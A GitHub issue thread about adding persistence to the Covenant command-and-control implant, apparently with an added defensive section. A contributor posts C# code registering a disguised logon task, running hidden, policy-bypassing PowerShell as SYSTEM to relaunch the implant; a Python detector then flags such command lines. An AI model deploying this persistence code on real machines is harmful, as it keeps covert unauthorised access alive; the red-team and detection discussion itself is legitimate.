
grunt persistence

Open robomotic opened this issue 6 years ago • 4 comments

Hello, do we have plan to integrate persistence when building the launcher?

Would love to see a basic diagram of the life cycle of a Grunt; currently it is based on an encrypted RC4 over HTTPS connection, right?

Persistence should be an option when building the first implant to make sure we get a connection back after reboots or if something goes wrong.

Let me know your thoughts. :-)

robomotic avatar Jun 20 '19 23:06 robomotic

Hey @robomotic, I definitely would like to add some more persistence options in the near future. I don't envision embedding persistence directly into the implant itself, but likely as post-exploitation Tasks. But if you come up with a good roadmap for what it might look like in the implant itself, I am open to suggestions.

A life-cycle of a Grunt diagram would be a great idea, I'll add that to the to-do list.

RC4 is not used for encryption. Covenant utilizes an EKE (Encrypted Key Exchange) to negotiate an AES key that is used for encryption. Optionally, SSL can additionally be used if you are communicating over HTTPS.

cobbr avatar Jun 21 '19 03:06 cobbr

Thanks for the clarification. For persistence I was thinking something along these lines: under Covenant/Data/Tasks we could create one for each type. For example, a persistence Task based on Win32 logon could be implemented like this:

```csharp
using System;
using SharpSploit.Execution;

public static class Task
{
    // ps_command is the PowerShell one-liner the scheduled task should run
    // (intended to be the Grunt stager). It is inserted unescaped, so any
    // embedded double quotes will break the /tr argument below.
    public static string Execute(string ps_command)
    {
        try
        {
            string ps_path = "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe";
            string ps_flags = "-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c";
            string ps_one_liner = String.Format("{0} {1} {2}", ps_path, ps_flags, ps_command);
            // Register a task that runs the one-liner as SYSTEM at every logon.
            // schtasks limits the length of the /tr argument, so an overly long stager is rejected.
            string ShellCommand = String.Format("schtasks /create /tn OfficeUpdaterA /tr \"{0}\" /sc onlogon /ru System", ps_one_liner);
            return Shell.ShellCmdExecute(ShellCommand);
        }
        catch (Exception e)
        {
            // Return the exception text to the operator instead of failing silently.
            return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace;
        }
    }
}
```

Now the ps_command should include the actual one-liner of the Grunt implant. Is there a way to inherit that from the Grunt executing the Task? Otherwise you will have to pass it to the method, which is not elegant. It is important to remember that this kind of approach is limited by the maximum number of characters in the command line.

If this is possible I can easily port the following methods from https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1.

Cheers.

robomotic avatar Sep 25 '19 11:09 robomotic
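The Task sketched above leaves a recognisable footprint: a `schtasks /create` invocation whose `/tr` action launches PowerShell with a hidden window, bypassed execution policy and no profile, triggered at logon and running as SYSTEM. As an added example from the defender's side (not part of this thread and not Covenant code), the following Python checker parses process command lines of that shape and reports which of those indicators are present. The sample command lines are constructed for the example; the switch parser is a heuristic for `schtasks` syntax and the `<STAGER_PLACEHOLDER>` token stands in for whatever one-liner would be passed as `ps_command`.

```python
"""Flag scheduled-task creations that launch hidden, policy-bypassing PowerShell.

Constructed example: given process command lines such as Windows process-creation
auditing records, find `schtasks /create` invocations whose /tr action matches the
hidden-PowerShell pattern and list the indicators that fired.
"""
import re

# (indicator name, regex matched case-insensitively against the /tr action)
ACTION_INDICATORS = [
    ("powershell", r"powershell(\.exe)?"),
    ("hidden_window", r"-w(indowstyle)?\s+hidden"),
    ("bypass_policy", r"-e(p|xecutionpolicy)\s+bypass"),
    ("no_profile", r"-no(p|profile)\b"),
    ("non_interactive", r"-noni(nteractive)?\b"),
    ("encoded_or_inline", r"-(enc(odedcommand)?|c(ommand)?)\b"),
]

# Heuristic schtasks switch parser: `/name value` or `/name "quoted value"`.
# A quoted value ends at a quote that is followed by the next switch or end of line,
# so a one-liner containing inner quotes is still captured whole in most cases.
SWITCH_RE = re.compile(
    r'/(?P<name>[a-z]+)\s+(?:"(?P<quoted>.*?)"(?=\s+/|\s*$)|(?P<bare>[^/\s]\S*))',
    re.IGNORECASE,
)

# Constructed sample command lines (not real telemetry).
SAMPLE_LINES = [
    r'schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe '
    r'-WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c <STAGER_PLACEHOLDER>" /sc onlogon /ru System',
    r'schtasks /create /tn NightlyBackup /tr "C:\Tools\backup.exe --full" /sc daily /st 02:00',
    r'powershell.exe -c Get-Process',
]


def parse_schtasks(cmdline):
    """Return a dict mapping lower-cased schtasks switch names to their values."""
    switches = {}
    for m in SWITCH_RE.finditer(cmdline):
        value = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
        switches[m.group("name").lower()] = value
    return switches


def assess(cmdline):
    """Return the list of indicators found in a `schtasks /create` line, or None
    if the line is not a scheduled-task creation at all."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    switches = parse_schtasks(cmdline)
    action = switches.get("tr", "")
    hits = [name for name, rx in ACTION_INDICATORS if re.search(rx, action, re.IGNORECASE)]
    trigger = switches.get("sc", "").lower()
    if trigger in ("onlogon", "onstart"):
        hits.append("trigger_" + trigger)
    if switches.get("ru", "").lower() in ("system", "nt authority\\system"):
        hits.append("runs_as_system")
    return hits


def scan(lines, threshold=3):
    """Return [{'line': index, 'hits': [...]}] for lines with at least `threshold` indicators."""
    findings = []
    for idx, line in enumerate(lines):
        hits = assess(line)
        if hits is not None and len(hits) >= threshold:
            findings.append({"line": idx, "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(f"line {finding['line']}: {', '.join(finding['hits'])}")
```

The threshold keeps ordinary administrative tasks (the backup line) out of the results while the logon task from the thread trips every indicator; in practice the same parser can be pointed at Sysmon event ID 1 or Security event 4688 command lines.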

Hey @robomotic, I'd recommend heading over to the Covenant GitHub page at https://github.com/cobbr/Covenant

There are a few persistence Tasks built-in now. But feel free to add new ones!

cobbr avatar Sep 25 '19 13:09 cobbr

Wow you have been busy!

robomotic avatar Sep 26 '19 22:09 robomotic